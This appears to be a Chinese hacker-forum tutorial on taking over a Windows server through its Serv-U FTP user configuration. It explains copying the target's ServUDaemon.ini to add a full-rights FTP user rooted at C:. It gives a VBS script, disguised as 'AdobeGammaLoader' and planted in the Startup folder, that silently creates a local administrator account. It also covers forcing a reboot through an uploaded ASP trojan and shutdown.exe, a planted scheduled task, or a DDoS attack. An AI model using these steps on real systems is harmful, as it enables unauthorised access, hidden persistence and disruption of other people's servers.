注:在此之前最好在自己的机器上装一个Serv-U,
我们先看看ServUStartUpLog.txt
Sat01Mar0112:15:24-Serv-UFTPServerv4.0(4.1.0.0)-Copyright(c)1995-2002Cat
。。。。。。。。。。
版本挺新阿,呵呵
接着看看ServUDaemon.ini(用户配置文件)
哇考,里面的用户真多阿!
接着我们把这个文件的内容复制一下,然后粘贴到本地serv-u的ServUDaemon.ini文件中,记住这时候最好停掉你的serv-u,保存文件,接着打开ServUAdmin.exe,重新添加一个用户,记住这个用户最好是管理员权限,必须对目录和文件可以进行读写可执行等一切操作,接着把用户主目录设为c:
哈哈哈,到次为止大家都知道我的用意了把!
接这ftp上去
哈哈c盘的东西全部暴露了,现在我们对c盘有读写权限,可以进行任何操作(注意:serv-u的管理员权限和nt的管理员权限不是一样的,serv-u的管理员只能配置serv-u)
由于对方做了端口过滤,办法不是很多,可以参考一篇修改注册表根改端口过滤的文章,是灰色轨迹论坛的一个网友写的,哈哈,在这里就不多说了!
我们先写一个vbs脚本,把这个脚本重命名为AdobeGammaLoader,这样管理员不容易发现!
脚本内容:
setwshshell=createobject("wscript.shell")
a=wshshell.run("cmd.exe/cnetuserallen*****/add",0)
b=wshshell.run("cmd.exe/cnetlocalgroupAdministratorsallen/add",0)
大家都能看懂把,哈哈
然后把他传到DocumentsandSettingsAllUsers「开始」菜单程序启动
呵呵为什么要vbs脚本呢?原因很简单,就是不让管理员看见那个跳出来的黑黑的dos窗口。
接着用asp木马上传一个shutdown.exe
然后执行shutdown.exe127.0.0.1/r
哈哈,有时候可能不会成功,是权限的原因,具体。。。我也不太清楚。
不过在ntor2000上普通用户都可以重起机器
还有一个办法就是在你的机器上新建一个计划任务,内容就是定时重启动计算机,然后把他放到对方计划任务的目录下,如果对方没有开计划任务就不行了!
如果还是成功不了你就用ddos把,哈哈,很暴力的让对方拒绝服务,接这就会重启(有可能是管理员操作的)
【Serv-U 用户的另类盗取】相关文章:
★ AngelShell:让所有正向程序实现反向连接(应用篇)